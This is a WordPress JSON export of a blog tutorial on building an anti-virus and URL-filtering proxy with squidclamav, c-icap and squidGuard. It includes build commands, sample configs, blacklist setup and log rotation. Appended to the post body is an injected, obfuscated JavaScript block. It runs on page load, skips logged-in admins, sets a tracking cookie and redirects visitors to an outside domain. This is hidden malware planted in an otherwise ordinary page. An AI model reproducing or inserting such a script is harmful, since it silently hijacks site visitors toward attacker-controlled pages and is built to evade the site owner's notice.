{"id":188,"date":"2012-03-02T10:49:50","date_gmt":"2012-03-02T02:49:50","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=188"},"modified":"2012-03-03T13:11:58","modified_gmt":"2012-03-03T05:11:58","slug":"squidclamav-squidguard","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/03\/02\/squidclamav-squidguard\/","title":{"rendered":"Squidclamav &#038; SquidGuard"},"content":{"rendered":"<p>This post will guide you to setup an anti-virus and an URL filtering proxy.<br \/>\n<!--more--><br \/>\nOS: Slackware 13.37<br \/>\nSoftware: squidclamav 6.5, squidGuard 1.5-beta, c-icap 0.1.7<\/p>\n<h1>Required software component<\/h1>\n<ul>\n<li><a href=\"http:\/\/squidclamav.darold.net\/\">squidclamav<\/a> &#8211; anti-virus<\/li>\n<li><a href=\"http:\/\/www.squidguard.org\/\">squidGurard<\/a> &#8211; URL filtering<\/li>\n<li><a href=\"http:\/\/c-icap.sourceforge.net\/\">c-icap<\/a><\/li>\n<li><a href=\"http:\/\/www.clamav.net\">clamav<\/a> &#8211; scan virus<\/li>\n<\/ul>\n<h1>Installation<\/h1>\n<ul>\n<li>c-icap\n<pre>\r\n.\/configure --prefix=\/usr\/local\/c-icap --enable-large-files\r\nmake\r\nmake install\r\n\r\nmkdir -p \/usr\/local\/c-icap\/var\/run\r\nmkdir \/usr\/local\/c-icap\/var\/log\r\nchown -R nobody:nobody \/usr\/local\/c-icap\/var\r\n<\/pre>\n<\/li>\n<li>squidclamav\n<ul>\n<li>modify source file for the config file path, in the src\/squidclamav.h,\n<pre>\r\n#define CONFIG_FILE \"\/usr\/local\/squidclamav\/etc\/squidclamav.conf\"\r\n<\/pre>\n<pre>\r\n.\/configure --prefix=\/usr\/local\/squidclamav --with-c-icap=\/usr\/local\/c-icap\/\r\nmake\r\nmake install\r\n<\/pre>\n<\/li>\n<li>squidclamav.so install into \/usr\/local\/c-icap\/lib\/c_icap\/squidclamav.so<\/li>\n<\/ul>\n<li>squidGurad\n<pre>\r\n.\/configure --prefix=\/usr\/local\/squidGuard --with-squiduser=nobody\r\nmake\r\nmake install\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Configuration<\/h1>\n<ul>\n<li>base on <strong>\/usr\/local\/c-icap\/etc\/c-icap.conf<\/strong>, you may take the following options as reference,\n<pre>\r\nPidFile \/usr\/local\/c-icap\/var\/run\/c-icap.pid\r\nCommandsSocket \/usr\/local\/c-icap\/var\/run\/c-icap.ctl\r\nUser nobody\r\nGroup nobody\r\nServerAdmin you@your.address\r\nServerName YourServerName\r\n#Service echo srv_echo.so  #(uncomment)\r\n<\/pre>\n<\/li>\n<li><strong>\/usr\/local\/squidclamav\/etc\/squidclamav.conf<\/strong>, you may take the following options as reference,\n<pre>\r\nclamd_local \/usr\/local\/clamav\/var\/run\/clamd.socket\r\nlogredir 1\r\ndnslookup 0\r\n<\/pre>\n<\/li>\n<li><strong>\/usr\/local\/squid\/etc\/squid.conf<\/strong>, add\n<pre>\r\nacl POST method POST\r\nicap_enable on\r\nicap_send_client_ip on\r\nicap_send_client_username on\r\nicap_client_username_encode off\r\nicap_client_username_header X-Authenticated-User \r\nicap_preview_enable on\r\nicap_preview_size 1024\r\nicap_service service_req reqmod_precache bypass=1 icap:\/\/127.0.0.1:1344\/squidclamav\r\nadaptation_access service_req deny POST\r\nadaptation_access service_req allow all\r\nicap_service service_resp respmod_precache bypass=1 icap:\/\/127.0.0.1:1344\/squidclamav\r\nadaptation_access service_resp deny POST\r\nadaptation_access service_resp allow all\r\n\r\nurl_rewrite_program \/usr\/local\/squidGuard\/bin\/squidGuard\r\n<\/pre>\n<p><strong>It seem some sites will have problem with POST request when squidGurad is configured, the above setup will skip all POST request to squidGurad.<\/strong>\n<\/li>\n<\/ul>\n<h1>Blacklists for squidGuard<\/h1>\n<p>The squidGuard site have listed some <a href=\"http:\/\/www.squidguard.org\/blacklists.html\">blacklists<\/a> provider which you could download the lists and install in your site to deny the access to some sites by category.<\/p>\n<ul>\n<li><strong>\/usr\/local\/squidGuard\/squidGuard.conf<\/strong>\n<ul>\n<li>general option, define the blacklist DB and the log path\n<pre>\r\ndbhome \/usr\/local\/squidGuard\/db\r\nlogdir \/usr\/local\/squidGuard\/log\r\n  <\/pre>\n<\/li>\n<li>define the blacklist DB of the category\n<pre>\r\ndest phishing {\r\n  domainlist blacklists\/phishing\/domains\r\n  urllist blacklists\/phishing\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\n<\/pre>\n<\/li>\n<li>you may define some your whitelist\n<pre>\r\ndest whitelist {\r\n  domainlist whitelist\/domains\r\n  urllist whitelist\/urls\r\n}\r\n<\/pre>\n<\/li>\n<li>the ACL block\n<pre>\r\nacl {\r\n  default {\r\n    pass whitelist !phishing all\r\n    redirect http:\/\/yousite.com\/block.html\r\n  }\r\n}\r\n  <\/pre>\n<\/li>\n<li>adding all together, a complete sample of <strong>squidGuard.conf<\/strong>\n<pre>\r\ndbhome \/usr\/local\/squidGuard\/db\r\nlogdir \/usr\/local\/squidGuard\/log\r\ndest whitelist {\r\n  domainlist whitelist\/domains\r\n  urllist whitelist\/urls\r\n}\r\ndest ownbl {\r\n  domainlist bl\/domains\r\n  urllist bl\/urls\r\n}\r\ndest ads {\r\n  domainlist blacklists\/ads\/domains\r\n  urllist blacklists\/ads\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest adv {\r\n  domainlist blacklists\/adv\/domains  \r\n  urllist blacklists\/adv\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest phishing {\r\n  domainlist blacklists\/phishing\/domains\r\n  urllist blacklists\/phishing\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest spyware {\r\n  domainlist blacklists\/spyware\/domains\r\n  urllist blacklists\/spyware\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\n\r\nacl {\r\n  default {\r\n    pass whitelist !ownbl !ads !adv !phishing !spyware all\r\n    redirect http:\/\/yourcompany.com\/block.html\r\n  }\r\n}\r\n  <\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<li>Whitelist &#8211; you could define some whitelist url in <strong>\/usr\/local\/squidGuard\/db\/whitelist\/urls<\/strong>\n<pre>\r\nfacebook.com\r\nq-station.net\r\n<\/pre>\n<\/li>\n<li>Install 3rd party blacklist &#8211; basically, you could download the tar archive from providers, and untar it to <strong>\/usr\/local\/squidGuard\/db<\/strong>, in other words, after untar the archive, the directory structures should look like this:\n<pre>\r\nls -lR \/usr\/local\/squidGuard\/db\r\n\r\n\/usr\/local\/squidGuard\/db:\r\ndrwxr-xr-x  2 nobody nobody 4096 Mar  1 22:00 bl\/\r\ndrwxr-xr-x 99 nobody nobody 4096 Mar  2 05:26 blacklists\/\r\ndrwxr-xr-x  2 nobody nobody 4096 Mar  1 21:35 whitelist\/\r\n\r\n\/usr\/local\/squidGuard\/db\/bl:\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 22:00 domains\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 22:00 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists:\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 ads\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 adult\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 adv\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 aggressive\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 agressif\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 alcohol\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 anonvpn\/\r\n  :\r\n  :\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/ads:\r\ntotal 240\r\n-rw-r--r-- 1 nobody nobody  59204 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody   8349 Mar  2 05:26 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/adult:\r\ntotal 18592\r\n-rw-r--r-- 1 nobody nobody 17186368 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody  1851077 Mar  2 05:26 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/adv:\r\ntotal 924\r\n-rw-r--r-- 1 nobody nobody 214657 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody  43991 Mar  2 05:26 urls\r\n\r\n    :\r\n    :\r\n\r\n\/usr\/local\/squidGuard\/db\/whitelist:\r\ntotal 20\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 21:34 domains\r\n-rw-r--r-- 1 nobody nobody   24 Mar  1 21:34 urls\r\n<\/pre>\n<li>Compile the blacklist\n<pre>\r\n&gt; \/usr\/local\/squidGurad\/bin\/squidGuard -C all\r\n&gt; chown -R nobody:nobody \/usr\/local\/squidGuard\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Executing all the thing<\/h1>\n<pre>\r\n\/usr\/local\/c-icap\/bin\/c-icap # activate the ICAP service and allow scanning virus\r\n\/usr\/local\/squid\/bin\/squid -k reconfigure # activate the squidGurad by reconfigure the squid\r\n<\/pre>\n<h1>Post installation<\/h1>\n<ul>\n<li>log rotation\n<ul>\n<li><strong>\/etc\/logrotate.d\/c-icap<\/strong>\n<pre>\r\n\/usr\/local\/c-icap\/var\/log\/*log {\r\n     rotate 12\r\n     weekly\r\n     compress\r\n     delaycompress\r\n     postrotate\r\n     kill -HUP `cat \/usr\/local\/c-icap\/var\/run\/c-icap.pid`\r\n     endscript\r\n}\r\n <\/pre>\n<\/li>\n<li><strong>\/etc\/logrotate.d\/squidGuard<\/strong>\n<pre>\r\n\/usr\/local\/squidGuard\/log\/banned.log\r\n\/usr\/local\/squidGuard\/log\/squidGuard.log {\r\n  weekly\r\n  rotate 5\r\n  copytruncate\r\n  compress\r\n  notifempty\r\n  missingok\r\n}\r\n <\/pre>\n<\/ul>\n<\/li>\n<\/ul>\n<h1>Maintaince<\/h1>\n<ul>\n<li>Updating squidclamav.conf &#8211; you could safely restart c-icap to make system recognize the changes, or you could do the following by using the ICAP control interface:\n<pre>\r\necho -n \"squidclamav:cfgreload\" > \/usr\/local\/c-icap\/var\/run\/c-icap.ctl\r\n<\/pre>\n<\/li>\n<li>Updating blacklists &#8211; when you download new blacklists, you should compile the list by\n<pre>\r\n\/usr\/local\/squidGuard\/bin\/squidGuard -C all\r\n<\/pre>\n<\/li>\n<li>then you should make sure squidGuard could read the db\n<pre>\r\nchown -R nobody:nobody \/usr\/local\/squidGuard\/db\r\n<\/pre>\n<\/li>\n<li>make the new blacklist DB effective by\n<pre>\r\n\/usr\/local\/squid\/sbin\/squid -k reconfigure\r\n<\/pre>\n<\/li>\n<\/ul>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post will guide you to setup an anti-virus and an URL filtering proxy.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[37,38,39],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=188"}],"version-history":[{"count":32,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188\/revisions\/256"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}